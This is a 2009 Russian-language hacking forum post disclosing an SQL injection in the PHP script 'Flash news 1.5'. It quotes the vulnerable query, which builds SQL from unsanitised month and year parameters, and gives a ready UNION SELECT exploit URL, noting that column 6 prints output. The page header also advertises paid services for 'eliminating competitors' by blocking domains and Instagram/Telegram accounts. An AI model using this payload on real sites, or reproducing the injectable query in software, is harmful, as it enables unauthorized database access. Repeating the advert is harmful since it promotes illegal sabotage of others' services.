Форум АНТИЧАТ - SQL-inj Flash news 1.5

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS
SQL-inj Flash news 1.5

Опции темы

Поиск в этой теме

Опции просмотра

SQL-inj Flash news 1.5

02.09.2009, 18:48

FriLL

Познающий

Регистрация: 14.09.2008

Сообщений: 30

Провел на форуме:
117615

Репутация: 21

SQL-inj Flash news 1.5

Уязвимый код

PHP код:


		
			
if((isset($month))&&(isset($year)))

    {   //Выбираем из базы по месяцам

        $mysql="SELECT * FROM $tablename WHERE ((month=$month) AND (year=$year)) ORDER BY date DESC";

expl
out.php?month=09&year=1))-1+union+select+1,2,3,4,5,6+--+

6 поле принтабельное

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть первая	k00p3r	Чужие Статьи	1	12.07.2005 08:51
Обнаружение Sql инъекций в Oracle, часть вторая	k00p3r	Чужие Статьи	0	13.06.2005 11:26
Sql инъекция и Oracle, часть первая	k00p3r	Чужие Статьи	0	13.06.2005 11:23
Внедрение Sql кода с завязанными глазами	k00p3r	Чужие Статьи	0	12.06.2005 20:48
SQL Injection в Oracle	k00p3r	Чужие Статьи	0	12.06.2005 12:41

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход